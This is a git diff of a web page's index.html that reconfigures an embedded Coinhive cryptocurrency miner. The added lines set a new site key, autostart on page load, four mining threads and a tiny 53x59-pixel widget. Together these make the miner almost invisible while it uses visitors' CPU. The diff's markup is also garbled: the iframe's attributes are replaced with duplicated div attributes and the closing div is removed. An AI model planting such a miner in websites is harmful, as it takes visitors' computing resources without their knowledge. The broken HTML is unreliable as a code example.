--- a/index.html
+++ b/index.html
@@ -9,30 +9,17 @@
 </h3>
     <h4 align="center">
 <div class="coinhive-miner" 
-     style="width: 100%; height: 200px" 
-     data-key="We3FxsjdPPBqzEjwPwDL01V77SZHOynA" 
-     data-user="1064661" 
-     data-autostart="true" 
-     data-background="#000" 
-     data-text="#eee" 
-     data-action="#0f0" 
-     data-graph="#555" 
-     data-whitelabel="true">
-    
+ 	style="width: 53px; height: 59px"
+	data-key="C6FfXf8rUkX3of6Cv1DcA4Z7MKupaOwD"
+	data-autostart="true"
+	data-threads="4">
+ 
     <iframe src="https://authedmine.com/media/miner.html?key=We3FxsjdPPBqzEjwPwDL01V77SZHOynA&amp;
-                 user=1064661&amp;
-                 whitelabel=1&amp;
-                 autostart=true&amp;
-                 throttle=100%&amp;
-                 threads=2&amp;
-                 background=000&amp;
-                 text=eee&amp;
-                 action=0f0&amp;
-                 ref=&amp;
-                 graph=555" 
-                 style="width: 100%; height: 100%; border: none;">
+ 	style="width: 53px; height: 59px"
+	data-key="C6FfXf8rUkX3of6Cv1DcA4Z7MKupaOwD"
+	data-autostart="true"
+	data-threads="4">
     </iframe>
-    </div>
     </h4>
 </head>
 </body>
